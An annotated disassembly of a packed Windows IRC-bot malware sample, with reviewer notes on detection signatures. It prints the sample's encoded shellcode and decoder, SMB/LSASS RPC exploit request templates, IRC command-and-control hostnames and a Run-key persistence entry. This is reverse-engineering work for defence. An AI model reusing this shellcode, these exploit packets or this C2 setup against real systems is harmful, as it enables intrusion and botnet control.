sub_4036C6      proc near               ; CODE XREF: sub_401E10+14Bp ; sub_401E10+1D5p ...
        jmp     dword_4010D4            ; import thunk body of sub_4036C6; target name not shown here
sub_4036C6      endp


; =============== S U B R O U T I N E =======================================
; Attributes: thunk
; Import thunk through dword_4010D0, reached only from the SEH_* stubs below.
; NOTE(review): presumably the C++ runtime frame handler -- confirm against
; the import table.
sub_4036CC      proc near               ; CODE XREF: SEH_4022A0+5j ; SEH_402590+5j
        jmp     dword_4010D0
sub_4036CC      endp

; ---------------------------------------------------------------------------
        align 10h

; =============== S U B R O U T I N E =======================================
; Exception-handler stub for sub_4022A0: loads the address of its descriptor
; (dword_403708) into eax and jumps to the handler thunk.
SEH_4022A0      proc near               ; DATA XREF: sub_4022A0+5o
        mov     eax, offset dword_403708
        jmp     sub_4036CC
SEH_4022A0      endp

; ---------------------------------------------------------------------------
        align 10h
        ; Unnamed fragment that is not part of a proc; 4036F0h, its address by
        ; position, appears in the dword_403760 descriptor below.
        lea     ecx, [ebp-0BCh]
        jmp     loc_401DF0

; =============== S U B R O U T I N E =======================================
; Exception-handler stub for sub_402590, same shape as SEH_4022A0.
SEH_402590      proc near               ; DATA XREF: sub_402590+5o
        mov     eax, offset dword_403760
        jmp     sub_4036CC
SEH_402590      endp

; ---------------------------------------------------------------------------
        align 4
; Exception descriptors for the two stubs above. 19930520h is the magic value
; that opens a Visual C++ exception function-info record.
dword_403708    dd 19930520h, 2, 403728h, 1, 403738h, 3 dup(0)
        dd 0FFFFFFFFh, 0
        dd 0FFFFFFFFh, 3 dup(0)
        dd 2 dup(1), 403750h, 4 dup(0)
        dd offset sub_402459
dword_403760    dd 19930520h, 1, 403780h, 5 dup(0)
        dd 0FFFFFFFFh, 4036F0h, 21Eh dup(0)
; dword_404000: the first five dwords have the layout of a CryptoAPI public
; key blob: 206h (type 6, version 2), algorithm 2400h, magic 31415352h
; ("RSA1"), bit length 800h (2048) and public exponent 10001h, followed by 64
; dwords of modulus. Referenced from sub_401170 (not in this excerpt).
; NOTE(review): the import table lists CryptImportKey and
; CryptVerifySignatureA, so this is presumably the key the sample uses to
; verify signed data -- confirm in sub_401170 / sub_4011F0.
dword_404000    dd 206h, 2400h, 31415352h, 800h, 10001h, 826711F5h, 446D80B4h ; DATA XREF: sub_401170+42o
        dd 3B493FBCh, 0BC974723h, 0E710B644h, 0BB46041Dh, 0D4519A52h
        dd 4D6FCE6Ch, 47CACF3Fh, 17DAB6AAh, 0E985B846h, 8750550Ch
        dd 62D725C6h, 0B756274Ch, 0C5C66068h, 56054E02h, 5C435BBAh
        dd 0D43965E6h, 0B10DD7A2h, 0ADD37790h, 0C8099091h, 389683CAh
        dd 0DDA2D0C0h, 28132714h, 0C3C8E8D4h, 0DE4716DAh, 3A6237CDh
        dd 6C1650E2h, 8662EE76h, 0B8C8FCB3h, 35E03A95h, 0CDDF06B7h
        dd 0B4042653h, 23AF2C3Ch, 2AD55D63h, 87D89F05h, 86AA1D66h
        dd 40340516h, 1F1390A7h, 538D1015h, 0A2658B55h, 709EC36Ch
        dd 0AF03B0D4h, 0D054113Ch, 0C05DEE8Ch, 0D7652B6Eh, 0A772AC6Eh
        dd 0B851FA87h, 3474E2DEh, 1D25E34Ah, 0A35A706Ah, 89EF64E9h
        dd 0E3750E7h, 0F3A618FCh, 4DC41C20h, 74B24DB0h, 0D04ABB3h
        dd 0EF180298h, 0D25EE9A6h, 7308F74Eh, 0D9486CD7h, 0D37CF54Bh
        dd 1356C476h, 0E9DC87DDh
aCont           db 'cont',0             ; DATA XREF: sub_401150+3o
        align 10h
; loc_404120: position-independent blob referenced as data by sub_4016E0.
; It starts with a jump over two fields that loc_4032A0 fills in at run time
; (word_404122 and dword_404124), followed by a small decoder:
;   - call / pop ebp obtains the blob's own address
;   - 21Fh bytes starting at loc_404152+1 are decoded in place: each byte is
;     xored with 99h; an input byte of 99h is an escape, in which case the
;     next byte has 30h subtracted before the xor
;   - execution then continues at loc_404152+1
; Everything after "call loc_404128" is encoded data. The instruction
; mnemonics IDA shows for it are not meaningful.
; Detection: the decoder bytes and the 99h-heavy encoded body are stable byte
; patterns usable for static signatures.
loc_404120:                             ; DATA XREF: sub_4016E0+25Co ; sub_4016E0+273o ...
        jmp     short loc_404149
; ---------------------------------------------------------------------------
word_404122     dw 3412h                ; DATA XREF: UPX0:004032E1w
dword_404124    dd 0ABAAAAD5h
; ---------------------------------------------------------------------------

loc_404128:                             ; CODE XREF: UPX0:loc_404149p
        pop     ebp                     ; ebp = address following the call at loc_404149
        xor     ecx, ecx
        mov     cx, 21Fh                ; number of decoded bytes
        lea     esi, [ebp+5]            ; read pointer
        mov     edi, esi                ; write pointer (in place)

loc_404134:                             ; CODE XREF: UPX0:00404145j
        mov     al, [esi]
        cmp     al, 99h
        jnz     short loc_40413F
        inc     esi                     ; escape byte: use the next byte minus 30h
        mov     al, [esi]
        sub     al, 30h

loc_40413F:                             ; CODE XREF: UPX0:00404138j
        inc     esi
        xor     al, 99h
        mov     [edi], al
        inc     edi
        loop    loc_404134
        jmp     short near ptr loc_404152+1
; ---------------------------------------------------------------------------

loc_404149:                             ; CODE XREF: UPX0:loc_404120j
        call    loc_404128
        ; encoded data from here on, shown by IDA as instructions
        bound   esp, cs:[ebp+67h]

loc_404152:                             ; CODE XREF: UPX0:00404147j
        db 2Eh
        jno     short near ptr dword_404000+0E8h
        cdq
        leave
        cdq
        leave
        cdq
        leave
        adc     bh, ch
        mov     ebp, 9916FD91h
        leave
        sal     dword ptr [edx+68h], 0AAh
        inc     edx
        std
        db 66h
        stosb
        std
        adc     [edx-6700E3ECh], bh
        cdq
        leave
        cdq
        leave
        leave
        rep cwde
        icebp
        cwde
        cdq
        leave
        xchg    bl, [ecx-67EC8E37h]
        cdq
        leave
        cdq
        leave
        nop
        pop     edi
        retf
; ---------------------------------------------------------------------------
        dw 9237h
        dd 0B91C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
        dd 0C9999898h, 0DC71C999h, 99C99998h, 47ECE4C9h, 995D1854h
        dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998A971h, 0F3C999C9h
        dd 1065E368h, 9998E71Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
        dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
        dd 0E5149DBDh, 323291BDh, 89F34512h, 0E72C66CAh, 99C99998h
        dd 996B71C9h, 99C999C9h, 416713C9h, 0D95D1A74h, 1C965992h
        dd 99C99934h, 0F3C999C9h, 0C999F19Dh, 99C99989h, 0C999F1C9h
        dd 9998C999h, 0C999F3C9h, 0C9996171h, 0C999C999h, 0F0E3F367h
        dd 98EF1C10h, 0C999C999h, 0F1C999F3h, 0C999C999h, 0C9C99998h
        dd 98E72C66h, 0C999C999h, 0C9992A71h, 0C999C999h, 97C0E86Fh
        dd 669BF3C9h, 9998E72Ch, 71C999C9h, 99C99938h, 0D8C999C9h
        dd 0B2D5E5C1h, 0F3C9C959h, 0F1C9C99Bh, 0C999C999h, 14D9C999h
        dd 9998F404h, 0CAC999C9h, 0C9993571h, 0C999C999h, 9161688Dh
        dd 98F01C10h, 0C999C999h, 66611AC3h, 12CDA7EDh, 0C999F35Dh
        dd 2C66CBC9h, 0C99998EFh, 2C66C999h, 0C99998F0h, 1D71C999h
        dd 0C999C999h, 485AC999h, 66C096A6h, 9998F02Ch, 71C999C9h
        dd 99C999EDh, 4CC999C9h, 0F3EBA729h, 0F404149Ch, 99C99998h
        dd 0FB71CAC9h, 0C999C999h, 0F434C999h, 99F37126h, 99CE71C9h
        dd 99C999C9h, 133BF9C9h, 99ABECEFh, 2 dup(99C999C9h), 0FEC5B7C9h
        dd 0E1FCB7F6h, 99C999FCh, 5 dup(99C999C9h), 0CAC999C9h
        dd 0E9FCFCF5h, 0FCF2C999h, 0F5FCF7EBh, 0C999ABAAh, 0AAF934C7h
        dd 2A2DB459h, 0ACC91E66h, 0A5B7E7E6h, 0B8BD9CC9h, 0CDC9829Dh
        dd 0C9999271h, 0C999C999h, 513519BFh, 95BDFD14h, 0C791720Ah
        dd 0C871F934h, 0C999C999h, 0D212C999h, 80D512A5h, 0AA529AE1h
        dd 2A8D146Fh, 12B9C89Ah, 0AA4A9A8Bh, 9E595859h, 19DB9BABh
        dd 0ECC999A3h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
        dd 964A9ABDh, 12EB8D2Eh, 5A9A85D8h, 9A099D12h, 0BDDD105Ah
        dd 1C10F885h, 0C99998E3h, 4966C999h, 0FEFD7F66h, 99A98712h
        dd 95C212C9h, 1285C212h, 91C21282h, 0F7FCB75Ah, 0B7FDh
; Request templates used by sub_4016E0. Each starts with a four-byte length
; prefix followed by the bytes FFh 'S' 'M' 'B' (424D53FFh) and a command byte:
;   dword_4043F4  72h  negotiate, with the dialect strings that follow
;   dword_404480  73h  session setup (contains "NTLMSSP", message type 1)
;   dword_40452C  73h  session setup (contains "NTLMSSP", message type 3)
;   dword_40460C  75h  tree connect
;   dword_404670  0A2h create / open
;   dword_4046DC, dword_404780, dword_404900  25h  transaction
;   dword_404894  2Fh  write
; Detection: the fixed field values and embedded strings in these templates
; are stable and suit network signatures for traffic to the SMB service.
dword_4043F4    dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_4016E0+1A2o
        dd 0FEFF0000h, 0
        dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
        db    2
        db  4Ch ; L
        db  41h, 4Eh, 4Dh
        db  41h ; A
        db  4Eh, 31h, 2Eh
        db  30h ; 0
        align 2
        dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
        db    2
        dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
        dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_404480    dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+1D9o
        dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
        dd 20000000h, 0
        dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
        dd 4 dup(0)
aWindows2000219:
        unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
        unicode 0, <Windows 2000 5.0>,0
        align 4
        dd 0
dword_40452C    dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+20Ao
        dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
        dd 57000000h, 0
        dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
        dd 0
        dd 47000000h, 0
        dd 40000000h, 0
        dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
        dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
        dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
        dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
        dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
        dd 2E0035h, 30h, 0
; Tree-connect template. The UTF-16 path inside it decodes to
; \\192.168.1.210\IPC$ followed by the service string "?????".
; NOTE(review): the address is presumably a placeholder replaced at run time
; (a "\\%s\ipc$" format string is stored at dword_404AF8) -- confirm in sub_4016E0.
dword_40460C    dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+95o
        dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
        dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
        dd 5C0030h, 500049h
        db 43h, 0, 24h
dword_404663    dd 3F000000h
dword_404667    dd 3F3F3F3Fh
byte_40466B     db 0                    ; DATA XREF: sub_4016E0+F7r
        align 10h
; Create/open template; the UTF-16 name at its end decodes to \lsarpc.
dword_404670    dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+307o
        dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
        dd 2019Fh, 3 dup(0)
        dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
        dd 0
; Transaction template on \PIPE\ carrying an RPC bind (bytes 05 00 0B 03)
; for interface 3919286a-b10c-11d0-9ba8-00c04fd92ef5.
dword_4046DC    dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+338o
        dd 4DC0800h, 500800h, 48000010h, 0
        dd 4, 2 dup(0)
        dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
        dd 5C0045h, 0
        dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
        dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
        dd 0
        dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_404780    dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+51Bo
        dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
        dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
        dd 5C0045h, 0
        dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
        dd 3ECh, 0
; Table referenced from sub_4016E0; the meaning of its entries is not
; established by this excerpt.
off_404800      dd offset loc_401495    ; DATA XREF: sub_4016E0+54Co
        dd 3, 40707Ch, 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd offset loc_40707A+2
        dd 1, 0
        dd 1, 0
        dd offset loc_40707A+2
        dd 1, 0
        dd 1, 0
        dd offset loc_40707A+2
        dd 1, 0
        dd 1, 0
        dd 138578h, 0E9A65BABh, 0
dword_404894    dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+373o
        dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
        dd 8FFFFFFh, 10B800h, 4010B800h, 0
        dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
        dd 0DADh, 0
        dd 0DADh, 0
dword_404900    dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_4016E0+3A6o
        dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
        dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
        dd 5C0045h, 0
        dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_404974    dd 0
        dd 40A89Ah, 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 1, 0
        dd 40A89Ah, 1, 0
        dd 1, 0
        dd 40A89Ah, 1, 0
        dd 1, 0
        dd 40A89Ah, 1, 0
        dd 1, 4 dup(0)
; Three records whose embedded text decodes to "WinXP Pro", "Win2k Pro" and
; "Win2k AS", each followed by one dword. The meaning of those dwords is not
; established by this excerpt.
        dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_404A38    dd 1004600h
        dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_404A74    dd 7515123Ch
        dd 2, 326E6957h, 5341206Bh, 0Bh dup(0)
        dd 751C123Ch, 0Fh dup(0)
dword_404AF0    dd 6EB06EBh
        align 8
; The three dwords below are the ASCII format string "\\%s\ipc$".
dword_404AF8    dd 73255C5Ch, 6370695Ch, 24h
dword_404B04    dd 1CEC8166h
dword_404B08    dd 0E4FF07h
; off_404B0C: table of eleven host-name pointers read by sub_402590. Together
; with the USER / NICK / PASS / JOIN / PRIVMSG format strings below, the
; names look like the IRC servers used as a command channel.
; Network indicators: DNS lookups of and connections to these names. Most are
; public IRC network servers, so the names identify the channel the sample
; uses rather than infrastructure owned by its operator.
off_404B0C      dd offset aMoscowAdvokat_ ; DATA XREF: sub_402590:loc_402647r ; sub_402590+140r ; "moscow-advokat.ru"
        dd offset aGraz_at_eu_und       ; "graz.at.eu.undernet.org"
        dd offset aFlanders_be_eu       ; "flanders.be.eu.undernet.org"
        dd offset aCaen_fr_eu_und       ; "caen.fr.eu.undernet.org"
        dd offset aBrussels_be_eu       ; "brussels.be.eu.undernet.org"
        dd offset aLosAngeles_ca_       ; "los-angeles.ca.us.undernet.org"
        dd offset aWashington_dc_       ; "washington.dc.us.undernet.org"
        dd offset aLondon_uk_eu_u       ; "london.uk.eu.undernet.org"
        dd offset aLia_zanet_net        ; "lia.zanet.net"
        dd offset aGaspode_zanet_       ; "gaspode.zanet.org.za"
        dd offset dword_404B38
; The three dwords below are the ASCII string "irc.kar.net".
dword_404B38    dd 2E637269h, 2E72616Bh, 74656Eh
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:00404B30o
        align 4
aLia_zanet_net  db 'lia.zanet.net',0    ; DATA XREF: UPX0:00404B2Co
        align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:00404B28o
        align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:00404B24o
        align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:00404B20o
        align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B1Co
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:00404B18o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B14o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:00404B10o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_404B0Co
        align 4
; Alphabets referenced by sub_401C90.
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_401C90+1Eo
        align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_401C90+Bo
        align 4
; IRC client protocol strings (registration, keep-alive, channel join,
; messages), referenced by the routines named in the cross-references.
aUserS8S        db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_401E10+1F2o
        align 10h
aAlready        db 'already',0          ; DATA XREF: sub_401E10+145o ; sub_401E10+1CFo
aNickS          db 'NICK %s',0Dh,0Ah,0  ; DATA XREF: sub_401E10+E0o ; sub_401E10+16Eo
        align 4
aPassS          db 'PASS %s',0Dh,0Ah,0  ; DATA XREF: sub_401E10+A2o
        align 10h
aPongS          db 'PONG%s',0Dh,0Ah,0   ; DATA XREF: sub_402090+5Ao
        align 4
aPing           db 'PING',0             ; DATA XREF: sub_402090+Do ; sub_402120+B2o
        align 4
a451            db '451',0              ; DATA XREF: sub_402120+8Co
aJoinS          db 'JOIN %s',0Dh,0Ah,0  ; DATA XREF: sub_402120+15o
        align 4
aQuitS          db 'QUIT %s',0Dh,0Ah,0  ; DATA XREF: sub_402230+28o
        align 10h
; Short phrases referenced by sub_4022A0.
aYo             db 'yo!',0              ; DATA XREF: sub_4022A0+44o
aCool           db 'cool!',0            ; DATA XREF: sub_4022A0+3Do
        align 4
aHehe           db 'hehe',0             ; DATA XREF: sub_4022A0+36o
        align 4
aHi             db 'hi :)',0            ; DATA XREF: sub_4022A0+2Fo
        align 4
aPrivmsgSS      db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_402480+51o
aQ:                                     ; DATA XREF: sub_402590+E0o ; sub_4028D0+175o
        unicode 0, <q>,0
a_exe           db '.exe',0             ; DATA XREF: sub_402790+71o ; sub_403460+4Bo
        align 4
asc_404D18:                             ; DATA XREF: sub_402790+4Bo ; sub_403460+57o
        unicode 0, <\>,0
; Fixed User-Agent string referenced by sub_402790; an HTTP indicator if that
; routine performs the download its imports suggest (not shown here).
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0 ; DATA XREF: sub_402790+11o
        align 10h
aJoin           db 'JOIN',0             ; DATA XREF: sub_4028D0+1ACo
        align 4
aDD5            db '%d,%d,5',0          ; DATA XREF: sub_4028D0+152o
aI:                                     ; DATA XREF: sub_4028D0+135o
        unicode 0, <i>,0
a1              db '-1',0               ; DATA XREF: sub_4028D0+111o
        align 4
asc_404D68:                             ; DATA XREF: sub_4028D0+E2o
        unicode 0, <|>,0
aE:                                     ; DATA XREF: sub_4028D0+A7o
        unicode 0, <e>,0
; Strings referenced by start-up code before this excerpt; their use is not
; shown here.
aUterm5         db 'uterm5',0           ; DATA XREF: UPX0:00402EA4o
        align 4
aU2             db 'u2',0               ; DATA XREF: UPX0:00402E99o
        align 4
aR10            db 'r10',0              ; DATA XREF: UPX0:00402E8Eo
aGo_exe         db 'go.exe',0           ; DATA XREF: UPX0:00402E6Co
        align 4
aU              db '-u',0               ; DATA XREF: UPX0:00402E52o
        align 4
asc_404D8C      db 0Dh,0Ah,0            ; DATA XREF: sub_402F80+1A2o
        align 10h
; Reply text of the port 113 listener (sub_402F80).
aUseridUnix     db ' : USERID : UNIX : ',0 ; DATA XREF: sub_402F80+13Do
; Persistence key and value name written by sub_403460.
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_403460+97o ; sub_403540+29o
        align 4
aWinupdate      db 'WinUpdate',0        ; DATA XREF: sub_403460+92o ; sub_403540+24o
        align 10h
        dd 5 dup(0)
; Marker key and value used by sub_403540.
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_403540+55o ; sub_403540+9Ao ...
aServer         db 'Server',0           ; DATA XREF: sub_403540+50o ; sub_403540+95o ...
        align 4
a1_0:                                   ; DATA XREF: sub_403540+4Bo
        unicode 0, <1>,0
        dd 7 dup(0)
; Run-time state. Uses that are visible in this excerpt:
;   dword_404F70  handle closed by sub_403460 before the copy is launched
;   dword_404F74  random id sent by the port 113 listener
;   dword_404F94  source of the word stored in word_404122
;   dword_404F9C  counter incremented by sub_4031F0
;   dword_404FA0  flag written by sub_403540
dword_404E38    dd 40h dup(0)           ; sub_4028D0+E7o ...
dword_404F38    dd 0                    ; sub_4028D0+181r ...
dword_404F3C    dd 0                    ; sub_4028D0+58r ...
dword_404F40    dd 8 dup(0)             ; sub_4028D0+11o
dword_404F60    dd 0                    ; sub_4028D0+10Cw
dword_404F64    dd 0                    ; sub_402CF0+6Fw
dword_404F68    dd 0                    ; UPX0:00402CC6o ...
dword_404F6C    dd 0                    ; sub_402CF0+58w ...
dword_404F70    dd 84h                  ; sub_403460+A6r
dword_404F74    dd 8 dup(0)             ; sub_402F80+174o
dword_404F94    dd 0                    ; UPX0:004032D2r
dword_404F98    dd 400000h
dword_404F9C    dd 0                    ; sub_4031F0+71o ...
dword_404FA0    dd 0                    ; sub_403540+33w ...
        align 80h
UPX0            ends

; Section 2. (virtual address 00005000)
; Virtual size                  : 00003000 (  12288.)
; Section size in file          : 00003000 (  12288.)
; Offset to raw data for section: 00005000 ; Flags E0000040: Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 405000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_405000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:00406F41o dd 61757472h, 6C6C416Ch, 100636Fh, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 47010063h, 6F4D7465h, 656C7564h, 646E6148h, 41656Ch dd 74654701h, 6D6D6F43h, 4C646E61h, 41656E69h, 65440100h dd 6574656Ch, 656C6946h, 43010041h, 74616572h, 74754D65h dd 417865h, 74654701h, 75646F4Dh, 6946656Ch, 614E656Ch dd 41656Dh, 74654701h, 656C6946h, 657A6953h, 65520100h dd 69466461h, 100656Ch, 65746E49h, 636F6C72h, 4964656Bh dd 6572636Eh, 746E656Dh, 736C0100h, 70637274h, 1004179h dd 54746547h, 436B6369h, 746E756Fh, 65470100h, 73614C74h dd 72724574h, 100726Fh, 74737953h, 69546D65h, 6F54656Dh dd 656C6946h, 656D6954h, 65470100h, 73795374h, 546D6574h dd 656D69h, 6F6C4301h, 61486573h, 656C646Eh, 72570100h dd 46657469h, 656C69h, 65724301h, 46657461h, 41656C69h dd 736C0100h, 70637274h, 416E79h, 74655301h, 72727543h dd 44746E65h, 63657269h, 79726F74h, 47010041h, 79537465h dd 6D657473h, 65726944h, 726F7463h, 1004179h, 74697845h dd 65726854h, 1006461h, 45746553h, 746E6576h, 61570100h dd 6F467469h, 6E695372h, 4F656C67h, 63656A62h, 43010074h dd 74616572h, 72685465h, 646165h, 65724301h, 45657461h dd 746E6576h, 6C010041h, 6C727473h, 416E65h, 656C5301h dd 1007065h, 7274736Ch, 41746163h, 78450100h, 72507469h dd 7365636Fh, 6C010073h, 63727473h, 41706Dh, 65724301h dd 50657461h, 65636F72h, 417373h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 
4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0D000h, 5F5F0100h, 46787843h dd 656D6172h, 646E6148h, 72656Ch, 72747301h, 727473h, 72747301h dd 726863h, 61727301h, 100646Eh, 646E6172h, 0E90000h, 0E80000h dd 77010000h, 69727073h, 4166746Eh, 0F40000h, 0F00000h dd 49010000h, 7265746Eh, 4F74656Eh, 556E6570h, 416C72h dd 746E4901h, 656E7265h, 61655274h, 6C694664h, 49010065h dd 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h, 6E726574h dd 65477465h, 6E6F4374h, 7463656Eh, 74536465h, 657461h dd 10000h, 10400h, 73FF00h, 0FF0008FFh, 6FFF0039h, 0BFF00h dd 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0017FFh, 2FF0009h dd 0DFF00h, 0FF0001FFh, 3FF0016h, 10FF00h, 13FFh, 0 dd 4550h, 2014Ch, 40AD17DAh, 2 dup(0) dd 10F00E0h, 6010Bh, 2E00h, 1000h, 0 dd 2E30h, 1000h, 4000h, 400000h, 1000h, 200h, 4, 0 dd 4, 0 dd 5000h, 400h, 0 dd 2, 100000h, 1000h, 100000h, 1000h, 0 dd 10h, 2 dup(0) dd 3788h, 8Ch, 14h dup(0) dd 1000h, 150h, 6 dup(0) dd 7865742Eh, 74h, 2D86h, 1000h, 2E00h, 400h, 3 dup(0) dd 0E0040020h, 7461642Eh, 61h, 0FA4h, 4000h, 1000h, 3200h dd 3 dup(0) dd 0C0000040h, 4000h, 3964h, 43ECh, 54EB38FDh, 0B4AE391Ah dd 1DBEC87Fh, 16F86C87h, 24C0D18Bh, 1C2BCA08h, 0D0AC38Eh dd 26BD50C2h, 71CD708Dh, 40256390h, 4638A10Fh, 6DBB0B2Ah dd 89252673h, 0F1730CDh, 441357BEh, 2E098D84h, 0B0150441h dd 5EE25095h, 0FF30A9h, 0F2C09FBh, 46706868h, 233D91FCh dd 2D024D1Ch, 1E30DCA0h, 8F8403B8h, 0E52B301Ch, 0D70EC3C7h dd 1A22A884h, 1E4894DDh, 0D776F6EEh, 0D64D614Ch, 0D932D6B9h dd 257CCEBBh, 
